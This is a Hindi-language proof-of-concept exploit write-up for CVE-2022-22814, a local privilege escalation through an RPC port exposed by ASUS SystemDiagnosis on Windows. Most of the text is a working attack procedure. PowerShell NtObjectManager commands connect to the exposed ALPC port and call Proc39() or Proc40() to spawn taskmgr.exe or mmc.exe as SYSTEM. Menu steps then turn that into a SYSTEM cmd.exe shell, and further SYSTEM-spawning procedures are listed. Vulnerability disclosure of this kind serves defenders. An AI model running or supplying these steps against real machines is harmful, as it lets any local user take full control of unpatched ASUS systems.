
CVE-2022-22814 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण जो कमजोर ASUS SystemDiagnosis ALPC RPC इंटरफ़ेस के माध्यम से Windows पर स्थानीय विशेषाधिकार वृद्धि प्रदर्शित करता है।
विशेषाधिकार वृद्धि - AsusSystemDiagnosis.exe - Proc39()
पूर्ण पथ: C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe
समस्या:
ALPC पोर्ट \RPC Control\ASHWTestServer, जो AsusSystemDiagnosis.exe द्वारा एक्सपोज़ किया गया है, किसी भी उपयोगकर्ता के लिए पूरी तरह सुलभ है। इस पोर्ट के माध्यम से RPC के जरिए Proc39() को कॉल करने से वर्तमान उपयोगकर्ता के सत्र में एक taskmgr.exe प्रक्रिया SYSTEM के रूप में स्पॉन होती है।
शोषण:
Project Zero के NtObjectManager RPC टूल का उपयोग करते हुए https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools (सुनिश्चित करें कि आप संकलित रिलीज़ लेते हैं) कमजोर RPC पोर्ट से कनेक्ट किया जा सकता है, जिसके बाद Proc39() को कॉल किया जा सकता है। एक बार SYSTEM taskmgr.exe प्रक्रिया स्पॉन हो जाने पर, कॉन्टेक्स्ट मेनू में "Run New Task" कार्यक्षमता का उपयोग करके cmd.exe शेल बनाया जा सकता है: File > Run New Task > cmd.exe।
NtObjectManager:
$server = get-rpcserver C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe
$client = get-rpcclient $server
$client.connect()
$client.Proc39()
विशेषाधिकार वृद्धि - AsusSystemDiagnosis.exe - Proc40()
ऊपर जैसा ही लेकिन यह mmc.exe को system के रूप में स्पॉन करता है। या तो एक नया कार्य बना सकते हैं या explorer.exe विंडो खोलने के लिए ब्राउज़ कार्यक्षमता का उपयोग कर सकते हैं और एड्रेस बार से cmd.exe निष्पादित कर सकते हैं।
अतिरिक्त नोट्स:
Proc53() - systemreset.exe को SYSTEM के रूप में स्पॉन करता है Proc54() - RecoveryDrive.exe को SYSTEM के रूप में स्पॉन करता है